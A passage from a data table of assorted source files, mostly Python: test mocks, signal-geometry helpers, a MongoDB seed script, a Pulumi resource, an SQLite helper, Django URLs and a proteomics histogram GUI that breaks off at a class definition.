text string | size int64 | token_count int64 |
|---|---|---|
from faker import Faker
from datetime import datetime
fake = Faker()
min_image_age_hours = 7
max_images_per_flavor = 1
max_image_age_hours = 20
azure_storage_resourcegroup = 'openqa'
ec2_max_snapshot_age_days = 1
ec2_max_volumes_age_days = 5
class MockImage:
def __init__(self, name, last_modified=None):
self.name = name
self.last_modified = last_modified
def mock_get_feature_property(feature: str, property: str, namespace: str = None):
if property == 'min-image-age-hours':
return min_image_age_hours
elif property == 'max-images-per-flavor':
return max_images_per_flavor
elif property == 'max-image-age-hours':
return max_image_age_hours
elif property == 'azure-storage-resourcegroup':
return azure_storage_resourcegroup
elif property == 'ec2-max-snapshot-age-days':
return ec2_max_snapshot_age_days
elif property == 'ec2-max-volumes-age-days':
return ec2_max_volumes_age_days
class ec2_meta_mock:
def __init__(self):
self.data = fake.uuid4()
class ec2_image_mock:
def __init__(self):
self.image_id = fake.uuid4()
self.meta = ec2_meta_mock()
self.name = fake.uuid4()
def ec2_tags_mock(tags={fake.uuid4(): fake.uuid4()}):
return [ {'Key': key, 'Value': tags[key]} for key in tags]
class ec2_instance_mock:
def __init__(self, **kwargs):
self.state = {'Name': fake.uuid4()}
self.instance_id = fake.uuid4()
self.image_id = fake.uuid4()
self.instance_lifecycle = fake.uuid4()
self.instance_type = fake.uuid4()
self.kernel_id = fake.uuid4()
self.launch_time = datetime.now()
self.public_ip_address = fake.uuid4()
self.security_groups = [{'GroupName': fake.uuid4()}, {'GroupName': fake.uuid4()}]
self.sriov_net_support = fake.uuid4()
self.tags = ec2_tags_mock(**kwargs)
self.state_reason = {'Message': fake.uuid4()}
self.image = ec2_image_mock()
class azure_instance_mock:
def __init__(self):
self.tags = fake.uuid4()
self.name = fake.uuid4()
self.id = fake.uuid4()
self.type = fake.uuid4()
self.location = fake.uuid4()
def gce_instance_mock():
return {
'name': fake.uuid4(),
'id': fake.uuid4(),
'machineType': fake.uuid4() + '/qq',
'zone': fake.uuid4() + '/qq',
'status': fake.uuid4(),
'creationTimestamp': datetime.now(),
'metadata': fake.uuid4(),
'tags': {'sshKeys': fake.uuid4()}
}
| 2,560 | 873 |
"""
Helps to quickly create source and sensor positions.
Try it with the following code:
>>> import numpy as np
>>> import sms_wsj.reverb.scenario as scenario
>>> src = scenario.generate_random_source_positions(dims=2, sources=1000)
>>> src[1, :] = np.abs(src[1, :])
>>> mic = scenario.generate_sensor_positions(shape='linear', scale=0.1, number_of_sensors=6)
"""
import numpy as np
from sms_wsj.reverb.rotation import rot_x, rot_y, rot_z
def sample_from_random_box(center, edge_lengths, rng=np.random):
""" Sample from a random box to get somewhat random locations.
>>> points = np.asarray([sample_from_random_box(
... [[10], [20], [30]], [[1], [2], [3]]
... ) for _ in range(1000)])
>>> import matplotlib.pyplot as plt
>>> from mpl_toolkits.mplot3d import Axes3D
>>> fig = plt.figure()
>>> ax = fig.add_subplot(111, projection='3d')
>>> _ = ax.scatter(points[:, 0, 0], points[:, 1, 0], points[:, 2, 0])
>>> _ = plt.show()
Args:
center: Original center (mean).
edge_lengths: Edge length of the box to be sampled from.
Returns:
"""
center = np.asarray(center)
edge_lengths = np.asarray(edge_lengths)
return center + rng.uniform(
low=-edge_lengths / 2,
high=edge_lengths / 2
)
def generate_sensor_positions(
shape='cube',
center=np.zeros((3, 1), dtype=np.float),
scale=0.01,
number_of_sensors=None,
jitter=None,
rng=np.random,
rotate_x=0, rotate_y=0, rotate_z=0
):
""" Generate different sensor configurations.
Sensors are index counter-clockwise starting with the 0th sensor below
the x axis. This is done, such that the first two sensors point towards
the x axis.
:param shape: A shape, i.e. 'cube', 'triangle', 'linear' or 'circular'.
:param center: Numpy array with shape (3, 1)
which holds coordinates x, y and z.
:param scale: Scalar responsible for scale of the array. See individual
implementations, if it is used as radius or edge length.
:param jitter: Add random Gaussian noise with standard deviation ``jitter``
to sensor positions.
:return: Numpy array with shape (3, number_of_sensors).
"""
center = np.array(center)
if center.ndim == 1:
center = center[:, None]
if shape == 'cube':
b = scale / 2
sensor_positions = np.array([
[-b, -b, -b],
[-b, -b, b],
[-b, b, -b],
[-b, b, b],
[b, -b, -b],
[b, -b, b],
[b, b, -b],
[b, b, b]
]).T
elif shape == 'triangle':
assert number_of_sensors == 3, (
"triangle is only defined for 3 sensors",
number_of_sensors)
sensor_positions = generate_sensor_positions(
shape='circular', scale=scale, number_of_sensors=3, rng=rng
)
elif shape == 'linear':
sensor_positions = np.zeros((3, number_of_sensors), dtype=np.float)
sensor_positions[1, :] = scale * np.arange(number_of_sensors)
sensor_positions -= np.mean(sensor_positions, keepdims=True, axis=1)
elif shape == 'circular':
if number_of_sensors == 1:
sensor_positions = np.zeros((3, 1), dtype=np.float)
else:
radius = scale
delta_phi = 2 * np.pi / number_of_sensors
phi_0 = delta_phi / 2
phi = np.arange(0, number_of_sensors) * delta_phi - phi_0
sensor_positions = np.asarray([
radius * np.cos(phi),
radius * np.sin(phi),
np.zeros(phi.shape)
])
elif shape == 'chime3':
assert scale is None, scale
assert (
number_of_sensors is None or number_of_sensors == 6
), number_of_sensors
sensor_positions = np.asarray(
[
[-0.1, 0, 0.1, -0.1, 0, 0.1],
[0.095, 0.095, 0.095, -0.095, -0.095, -0.095],
[0, -0.02, 0, 0, 0, 0]
]
)
else:
raise NotImplementedError('Given shape is not implemented.')
sensor_positions = rot_x(rotate_x) @ sensor_positions
sensor_positions = rot_y(rotate_y) @ sensor_positions
sensor_positions = rot_z(rotate_z) @ sensor_positions
if jitter is not None:
sensor_positions += rng.normal(
0., jitter, size=sensor_positions.shape
)
return np.asarray(sensor_positions + center)
def generate_random_source_positions(
center=np.zeros((3, 1)),
sources=1,
distance_interval=(1, 2),
dims=2,
minimum_angular_distance=None,
maximum_angular_distance=None,
rng=np.random
):
""" Generates random positions on a hollow sphere or circle.
Samples are drawn from a uniform distribution on a hollow sphere with
inner and outer radius according to distance_interval.
The idea is to sample from an angular centric Gaussian distribution.
Params:
center
sources
distance_interval
dims
minimum_angular_distance: In randiant or None.
maximum_angular_distance: In randiant or None.
rng: Random number generator, if you need to set the seed.
"""
enforce_angular_constrains = (
minimum_angular_distance is not None or
maximum_angular_distance is not None
)
if not dims == 2 and enforce_angular_constrains:
raise NotImplementedError(
'Only implemented distance constraints for 2D.'
)
accept = False
while not accept:
x = rng.normal(size=(3, sources))
if dims == 2:
x[2, :] = 0
if enforce_angular_constrains:
if not sources == 2:
raise NotImplementedError
angle = np.arctan2(x[1, :], x[0, :])
difference = np.angle(
np.exp(1j * (angle[None, :], angle[:, None])))
difference = difference[np.triu_indices_from(difference, k=1)]
distance = np.abs(difference)
if (
minimum_angular_distance is not None and
minimum_angular_distance > np.min(distance)
):
continue
if (
maximum_angular_distance is not None and
maximum_angular_distance < np.max(distance)
):
continue
accept = True
x /= np.linalg.norm(x, axis=0)
radius = rng.uniform(
distance_interval[0] ** dims,
distance_interval[1] ** dims,
size=(1, sources)
) ** (1 / dims)
x *= radius
return np.asarray(x + center)
| 6,725 | 2,178 |
#!/usr/bin/env python
"""
Seed integration overlock beta atlas:
python seed.py \
--host 'cluster0-shard-00-00-skv03.mongodb.net,cluster0-shard-00-01-skv03.mongodb.net,cluster0-shard-00-02-skv03.mongodb.net' \
--username integration-rw \
--db integration \
--ssl True \
--rs Cluster0-shard-0 \
--password <password in lastpass>
"""
from subprocess import check_output
import click
def wrapout(cmds):
output = check_output(cmds)
print(output.decode("utf8"))
@click.command()
@click.option("--host")
@click.option("--username")
@click.option("--password")
@click.option("--db")
@click.option("--rs")
@click.option("--datafile")
@click.option("--ssl", default=True, type=bool)
@click.option("--drop", default=False, type=bool)
@click.option("--with-host-prefix", default=False, type=bool)
@click.option("--collection")
def seed(host, username, password, with_host_prefix, rs, datafile, db, ssl, drop, collection):
base = [
"--port",
"27017",
]
if username and password:
base.extend([
"--username",
username,
"--password",
password,
"--authenticationDatabase",
"admin",
])
if ssl:
base.append("--ssl")
if rs:
drop_host = "{}?replicaSet={}".format(host, rs)
import_host = "{}/{}".format(rs, host)
else:
import_host = drop_host = "{}".format(host)
if with_host_prefix:
drop_host = "mongodb://" + drop_host
drop_cmd = [
"mongo",
"--host",
drop_host,
] + base + [
"--eval",
'acl_db = db.getSiblingDB("{0}"); acl_db.{1}.drop();'.format(db, collection),
]
seed_cmd = [
"mongoimport",
"--host",
import_host,
] + base + [
"--collection",
collection,
"--db",
db,
"--type",
"json",
"--file",
datafile,
"--jsonArray",
]
if drop:
wrapout(drop_cmd)
wrapout(seed_cmd)
if __name__ == "__main__":
seed()
| 2,093 | 728 |
from typing import Any
class Condition:
def __init__(self, value: Any):
self.value = value
class NotEQ(Condition):
def __eq__(self, other: Any):
return self.value != other
def __str__(self):
return f"<!={self.value}>"
class In(Condition):
def __init__(self, *args: Any):
super(In, self).__init__(args)
def __eq__(self, other: Any):
return other in self.value
def __str__(self):
return f"<in {self.value}>"
class NotIn(Condition):
def __init__(self, *args: Any):
super(NotIn, self).__init__(args)
def __eq__(self, other: Any):
return other not in self.value
def __str__(self):
return f"<not in {self.value}>"
| 729 | 241 |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['Source']
class Source(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
organization: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
A Cloud Security Command Center's (Cloud SCC) finding source. A finding
source is an entity or a mechanism that can produce a finding. A source is
like a container of findings that come from the same scanner, logger,
monitor, etc.
To get more information about Source, see:
* [API documentation](https://cloud.google.com/security-command-center/docs/reference/rest/v1beta1/organizations.sources)
* How-to Guides
* [Official Documentation](https://cloud.google.com/binary-authorization/)
## Example Usage
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the source (max of 1024 characters).
:param pulumi.Input[str] display_name: The source’s display name. A source’s display name must be unique
amongst its siblings, for example, two sources with the same parent
can't share the same display name. The display name must start and end
with a letter or digit, may contain letters, digits, spaces, hyphens,
and underscores, and can be no longer than 32 characters.
:param pulumi.Input[str] organization: The organization whose Cloud Security Command Center the Source
lives in.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['description'] = description
if display_name is None:
raise TypeError("Missing required property 'display_name'")
__props__['display_name'] = display_name
if organization is None:
raise TypeError("Missing required property 'organization'")
__props__['organization'] = organization
__props__['name'] = None
super(Source, __self__).__init__(
'gcp:securitycenter/source:Source',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
organization: Optional[pulumi.Input[str]] = None) -> 'Source':
"""
Get an existing Source resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the source (max of 1024 characters).
:param pulumi.Input[str] display_name: The source’s display name. A source’s display name must be unique
amongst its siblings, for example, two sources with the same parent
can't share the same display name. The display name must start and end
with a letter or digit, may contain letters, digits, spaces, hyphens,
and underscores, and can be no longer than 32 characters.
:param pulumi.Input[str] name: The resource name of this source, in the format 'organizations/{{organization}}/sources/{{source}}'.
:param pulumi.Input[str] organization: The organization whose Cloud Security Command Center the Source
lives in.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["description"] = description
__props__["display_name"] = display_name
__props__["name"] = name
__props__["organization"] = organization
return Source(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the source (max of 1024 characters).
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The source’s display name. A source’s display name must be unique
amongst its siblings, for example, two sources with the same parent
can't share the same display name. The display name must start and end
with a letter or digit, may contain letters, digits, spaces, hyphens,
and underscores, and can be no longer than 32 characters.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name of this source, in the format 'organizations/{{organization}}/sources/{{source}}'.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def organization(self) -> pulumi.Output[str]:
"""
The organization whose Cloud Security Command Center the Source
lives in.
"""
return pulumi.get(self, "organization")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 7,154 | 1,863 |
from unittest.mock import MagicMock
import pytest
from openapi_parser.builders import HeaderBuilder, SchemaFactory
from openapi_parser.enumeration import DataType
from openapi_parser.specification import Header, Integer, Schema, String
def _get_schema_factory_mock(expected_value: Schema) -> SchemaFactory:
mock_object = MagicMock()
mock_object.create.return_value = expected_value
return mock_object
string_schema = String(type=DataType.STRING)
integer_schema = Integer(type=DataType.INTEGER)
collection_data_provider = (
(
{
"X-Header": {
"schema": {
"type": "string"
}
}
},
[
Header(schema=string_schema, name="X-Header"),
],
_get_schema_factory_mock(string_schema)
),
(
{
"X-Header": {
"description": "The number of allowed requests in the current period",
"required": True,
"deprecated": True,
"schema": {
"type": "integer",
},
}
},
[
Header(
name="X-Header",
required=True,
description="The number of allowed requests in the current period",
deprecated=True,
schema=integer_schema
)
],
_get_schema_factory_mock(integer_schema)
),
)
@pytest.mark.parametrize(['data', 'expected', 'schema_factory'], collection_data_provider)
def test_build_collection(data: dict, expected: Header, schema_factory: SchemaFactory):
builder = HeaderBuilder(schema_factory)
assert expected == builder.build_list(data)
| 1,744 | 461 |
from model.msg2mail import Msg2Mail
from model.encoder import Encoder
from model.decoder import Decoder
from model.updater import RNNUpdater, AttnUpdater
from model.aggregator import MLPAggregator, AttnAggregator
| 213 | 66 |
import torch.nn as nn
class SeqForecast(nn.Module):
def __init__(self, input_dim, hidden_dim, num_layers=2):
super().__init__()
self.lstm = nn.LSTM(input_dim, hidden_dim,
num_layers, batch_first=True)
self.fc = nn.Linear(hidden_dim, 1)
# Use He(uniform) initialization for linear layer
for name, param in self.fc.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.kaiming_uniform_(param)
def forward(self, input):
# Propagate the input trough lstm
_, (hidden, _) = self.lstm(input)
# Get the prediction for the next time step
out = self.fc(hidden[-1, :, :])
return out.view(-1, 1)
| 808 | 262 |
from time import sleep
def countdown(when_to_stop: int):
while when_to_stop > 0:
try:
m, s = divmod(when_to_stop, 60)
h, m = divmod(m, 60)
time_left = str(h).zfill(2) + ":" + str(m).zfill(2) + ":" + str(s).zfill(2)
print(time_left, end="\r")
sleep(1)
when_to_stop -= 1
except KeyboardInterrupt:
print(f"KeyboardInterrupt at {time_left}")
break
except Exception as e:
print("Exception: ", e)
print()
def countdown_cui():
print("Enter 'q' or type Ctrl-c to terminate.")
while True:
inp_s = input("Specify a number in seconds >> ")
if inp_s == "q":
break
try:
when_to_stop = int(inp_s)
except KeyboardInterrupt:
print("KeyboardInterrupt")
break
except:
print("Not a number!")
continue
countdown(when_to_stop)
if __name__ == "__main__":
countdown_cui() | 1,025 | 336 |
import os
import constant
def human_size(number):
current_idx = 0
result = float(number)
while result > constant.size_diff:
if current_idx >= len(constant.size_unit):
break
result = result / constant.size_diff
current_idx += 1
return '{} {}'.format(round(result, constant.size_round), constant.size_unit[current_idx])
def classify_path(path, split_max, current_split=0):
if current_split == split_max:
yield list()
else:
split_path = path.split(os.path.sep)
current_max_len = len(split_path) - split_max + current_split + 1
for idx in range(current_max_len):
next_values = classify_path(os.path.sep.join(split_path[idx + 1:]),
current_split=current_split + 1,
split_max=split_max)
for next_value in next_values:
yield [split_path[idx]] + next_value
def classify_possible_path(path):
split_path_len = len(path.split(os.path.sep))
for split_max in range(1, split_path_len + 1):
for sort_key in classify_path(path=path, split_max=split_max):
yield os.path.sep.join(sort_key)
def make_dictionary_by_classification(iterable, ignore_list=None):
result = {}
for child in iterable:
child_path = child.part_path
for sort_key in classify_possible_path(child_path):
if ignore_list and sort_key in ignore_list:
continue
sort_value = result.setdefault(sort_key, dict())
sort_value.setdefault(constant.sort_size_name, 0)
sort_value[constant.sort_size_name] += child.total_size
sort_children = sort_value.setdefault(constant.sort_children_name, list())
sort_children.append(child)
return result
def sorted_dictionary(dictionary, max_key=10):
if max_key:
return sorted(dictionary.items(), key=lambda item: item[1][constant.sort_size_name], reverse=True)[:max_key]
else:
return sorted(dictionary.items(), key=lambda item: item[1][constant.sort_size_name], reverse=True)
| 2,146 | 650 |
from Module.SocketServer_Client import SocketServer_Client
Client = SocketServer_Client("localhost",5555) | 108 | 31 |
# from django.conf.urls import include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
# admin.autodiscover()
import django.contrib.auth.views as auth_views
import django.contrib.admindocs.urls as admindocs_urls
from django.urls import path, include
app_name = "fvserver"
urlpatterns = [
# Examples:
# url(r'^macnamer/', include('macnamer.foo.urls')),
path("login/", auth_views.LoginView.as_view(), name="login"),
path("logout/", auth_views.logout_then_login, name="logout"),
path(
"changepassword/",
auth_views.PasswordChangeView.as_view(),
name="password_change",
),
path(
"changepassword/done/",
auth_views.PasswordChangeDoneView.as_view(),
name="password_change_done",
),
path("", include("server.urls")),
# Uncomment the admin/doc line below to enable admin documentation:
path("admin/doc/", include(admindocs_urls)),
# Uncomment the next line to enable the admin:
path("admin/", admin.site.urls),
# url(r'^$', 'namer.views.index', name='home'),
]
| 1,103 | 349 |
import sqlite3
class SQLiteHelper(object):
def __init__(self,db_name,):
self.db_name = db_name
def create_table(self,table_name,columns):
name=str(self.db_name)
self.conn = sqlite3.connect(name+'.db')
self.c=self.conn.cursor()
query='('
query+='id INTEGER PRIMARY KEY'
for key, value in columns.items():
query+=','+key+' '+value
query+=')'
#print(query)
self.c.execute("CREATE TABLE IF NOT EXISTS " + table_name+' '+query)
self.conn.commit()
#print("created")
def selectAll(self,table_name):
query="SELECT * FROM "+table_name
return self.c.execute(query).fetchall()
def getColumns(self,table_name):
cursor = self.c.execute('select * from '+table_name)
return list(map(lambda x: x[0], cursor.description))
def selectWhereId(self,table_name,id):
query="SELECT * FROM "+table_name
query+=' where id='+str(id)
cursor=self.c.execute(query).fetchone()
columns=self.getColumns(table_name)
data={}
for i in range(0,len(columns)):
data[columns[i]]=cursor[i]
return data
def insert(self,table_name,values):
query='('
query+='id'
values_="("
values_+='NULL'
for key,value in values.items():
values_+=",'"+str(value)+"'"
query+=','+key
query+=')'
values_+=")"
#print(values_)
self.c.execute("INSERT INTO "+table_name+query+"VALUES"+values_)
self.conn.commit()
#print("inserted") | 1,639 | 506 |
import activitylogs
from events.registry import build_job
activitylogs.subscribe(build_job.BuildJobStartedTriggeredEvent)
activitylogs.subscribe(build_job.BuildJobSoppedTriggeredEvent)
activitylogs.subscribe(build_job.BuildJobDeletedTriggeredEvent)
activitylogs.subscribe(build_job.BuildJobCreatedEvent)
activitylogs.subscribe(build_job.BuildJobUpdatedEvent)
activitylogs.subscribe(build_job.BuildJobViewedEvent)
activitylogs.subscribe(build_job.BuildJobArchivedEvent)
activitylogs.subscribe(build_job.BuildJobRestoredEvent)
activitylogs.subscribe(build_job.BuildJobBookmarkedEvent)
activitylogs.subscribe(build_job.BuildJobUnBookmarkedEvent)
activitylogs.subscribe(build_job.BuildJobLogsViewedEvent)
activitylogs.subscribe(build_job.BuildJobStatusesViewedEvent)
| 765 | 220 |
"""
Copyright (c) 2018 Sébastien Eustace
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from .style import Style
class StyleStack(object):
def __init__(self, empty_style=None):
self.empty_style = empty_style or Style()
self.reset()
def reset(self):
self.styles = list()
def push(self, style):
self.styles.append(style)
def pop(self, style=None):
if not len(self.styles):
return self.empty_style
if not style:
return self.styles.pop()
for i, stacked_style in enumerate(reversed(self.styles)):
if style == stacked_style:
self.styles = self.styles[: len(self.styles) - 1 - i]
return stacked_style
raise ValueError("Incorrectly nested style tag found.")
def get_current(self):
if not len(self.styles):
return self.empty_style
return self.styles[-1]
| 1,918 | 595 |
"""histo_GUI.py: Written by Billy Rathje, OHSU, 2014.
Also Phil Wilmarth, OHSU.
Library of support functions and classes for PAW pipeline programs.
The MIT License (MIT)
Copyright (c) 2017 Phillip A. Wilmarth and OHSU
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Direct questions to:
Technology & Research Collaborations, Oregon Health & Science University,
Ph: 503-494-8200, FAX: 503-494-4729, Email: techmgmt@ohsu.edu.
"""
###############################
###############################
# converting to Python 3 -PW 9/16/2017
from tkinter import *
import tkinter.ttk as ttk
from tkinter import filedialog
from tkinter import messagebox
import os
import numpy as np
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
from PAW_lib import FigureGenerator
from PAW_lib import DataInfoAndFilter
from PAW_lib import Threshold
import PAW_lib
import pickle
class Histogram:
''' A histogram object tracks information needed to plot histogram data, including
the textstring to display, the matplotlib, plot itself, the plot widget, x ranges, the placement of
the vertical bar, the placement of curve fitting information, and a pointer to the original object
storing numpy data (histogram) '''
def __init__(self, h, notebook):
self.ntt = h.ntt
self.z = h.z
self.histogram = h # Pointer to data object
self.plot = None # The figure to plot
self.xmin = -6 # position of x axis
self.xmax = 12
self.vertLine = None # green tracking bar
self.vertLineThresholdSet = None # location of black dotted line
self.textString = '' # The string to plot
self.headerString = '' # first header line about text view
self.FDRThreshold = 1.0 # Flag for initial FDR threshold 'guess' value
self.sparseCutoff = 50 # Cutoff for number of Forward - Reverse spectra qualifying as spare
self.histogram.sparseData = False # Does the current histogram contain spare data? Used in filtering step
self.ln = self.initLn() # Placement of the line in the text view
self.notebook = notebook # Pointer to parent notebook
# Gui pointers
self.can = None # Pointer to canvas widget for this plot
# Builds text string and plot
self.makeTextString()
self.makePlot()
self.checkSparse() # Remove lines from sparse figures
def checkSparse(self):
if(self.histogram.sparseData):
self.vertLine.set_visible(False)
self.vertLineThresholdSet.set_visible(False)
def initLn(self):
''' Sets the initial value of the line in the table view to the first case of 1% FDR,
or determines if the data is sparse and then sets the sparseData flag to True.
'''
# print('Z, ntt, mod:', self.z, self.ntt, self.histogram.mod)
x = self.histogram.histo[self.histogram.histo.FDR.astype(float) <= self.FDRThreshold]
# print('length of x:', len(x))
# test = x[x['DiscScore'] > 2]
test = self.histogram.histo[self.histogram.histo['DiscScore'] > 2]
# print('length of test:', len(test))
if len(test.index) > 0:
# Sparse data - set discScore to 100.0
if(test[test.index == test.index[0]].RRForward.item() - test[test.index == test.index[0]].RRReverse.item() <= self.sparseCutoff):
self.histogram.sparseData = True
# not sure about the next line
self.zeroData = True
print('Warning, sparse data frame...', ' ntt: ', self.ntt, ' z:', self.z, ' mod:', self.histogram.mod)
if len(x.index) > 0:
# Normal data, find first FDR <= self.FDRThreshold
self.histogram.threshold = x.index[0]
return x.index[0] + 1 # Off by one, I think because of removing header line
# Frame is empty (no points where FDR is below cutoff)
else:
print('Warning, zero data frame...', ' ntt: ', self.ntt, ' z:', self.z, ' mod:', self.histogram.mod)
self.histogram.zeroData = True
self.histogram.sparseData = True
return 0
def setLn(self, val):
'''
Sets the position of the line. This is called by the gui widget's callbacks.
'''
if(self.histogram.sparseData):
self.vertLine.set_visible(True) # Make green line visible
self.ln = val
#self.histogram.threshold = self.ln - 1
def updateVerticalLine(self):
'''
Updates the position of the green vertical line. Has to look for the discscore value
corresponding to the current line in the text file. Ln in the text file corresponds to an
index in the discscore column. This is called by the gui widget's callbacks.
'''
xval = self.histogram.histo['DiscScore'][self.ln]
self.vertLine.set_xdata((xval, xval))
def setThresh(self, event):
'''
This updates the black dotted line and sets the plot's score threshold to the value at the
current location in the table/plot. This is called from one of the gui widget's callbacks.
'''
if(self.histogram.sparseData): # Manually override sparse data cutoff
self.histogram.sparseData = False
self.vertLineThresholdSet.set_visible(True) # Make black dotted line visible
self.histogram.threshold = self.ln - 1
xval = self.histogram.histo['DiscScore'][self.ln]
self.vertLineThresholdSet.set_xdata((xval, xval))
self.can.draw()
def makeTextString(self):
'''
Construct the text string
'''
# I use a cStringIO buffer in order to speed up the construction of the string. This buffer is passsed
# into panda's toString method, which takes a 'buf' param
from io import StringIO
output = StringIO()
# Make the text string, but don't display the index values.
self.textString = self.histogram.histo.to_string(buf = output, index=False, col_space=12)
self.textString = output.getvalue()
output.close() # Close the buffer
splitString = self.textString.split('\n')
self.textString = '\n'.join(splitString[1:])
self.headerString = splitString[0] # Make a seperate header line for the titles
def makePlot(self):
'''
Construct a matplotlib plot for this histogram.
'''
self.plot = Figure(figsize=(5,3), dpi=100)
target = self.plot.add_subplot(111)
decoy = self.plot.add_subplot(111)
# center is used for the x axis, and is calculated from the bins computed with linspace.
mybins = np.linspace(-8, 12, 301)
center = (mybins[:-1] + mybins[1:]) / 2
if(self.notebook.plotType.get() == 'Smoothed Plot'):
target.fill(center, self.histogram.Smforward, color='b')
decoy.fill(center, self.histogram.Smreverse, color='r')
else:
target.fill(center, self.histogram.forward, color='b')
decoy.fill(center, self.histogram.reverse, color='r')
# Adds the green vertical line. L is a tuple returned by the plot call that can be used to update the position later
# with set_xdata.
greenVerticalLine = self.plot.add_subplot(111)
l = greenVerticalLine.plot((0.0, 0.0), (target.axis()[2], target.axis()[3]), '-g', linewidth = 2.0)
self.vertLine = l[0]
# The black dotted line. Set the placement of it to the 1% FDR position.
vertLineThresholdSet = self.plot.add_subplot(111)
xval = self.histogram.histo['DiscScore'][self.ln]
l = vertLineThresholdSet.plot((xval, xval), (target.axis()[2], target.axis()[3]), '--k', linewidth = 2.0)
self.vertLineThresholdSet = l[0]
# If there are xmin or max values supplied, set them.
if self.xmin and self.xmax:
target.set_xlim(self.xmin, self.xmax)
decoy.set_xlim(self.xmin, self.xmax)
# set up labels
target.set_title('Z=%s, NTT=%s, %s' % (str(self.z), str(self.ntt), self.histogram.mod))
target.set_xlabel("Disc Score")
target.set_ylabel("Counts")
# makes sure the bottom axis is fully visible
self.plot.tight_layout()
def makePlotWidget(self, frcanvas):
''' Generate a tkinter canvas widget from the matplotlib plot. This is called
from setup() in the BRNotebook class, and frcanvas is the gui frame into which the widget
should be inserted. It should have already been constructed by the BRNotebook instance.
'''
canvas = BRCanvas(self.plot, master=frcanvas, gui=self.notebook.gui)
canvas.draw()
canvas.get_tk_widget().pack(side=LEFT, fill=BOTH, expand=YES)
canvas.get_tk_widget().bind('<Button-1>', canvas.focusCanvas) # These callbacks need to be set here because
canvas.get_tk_widget().bind('<Return>', self.setThresh) # they are handled differently for deltamass plots.
frcanvas.pack(side=TOP, expand=YES, fill=BOTH) # Other callbacks are set in the BRCanvas class that don't vary.
canvas.histogram = self # Retain reference to self # Allow access to this class from the canvas widget.
self.can = canvas # Keep track of the canvas widget in an instance variable.
class DeltaMassHistogram(Histogram):
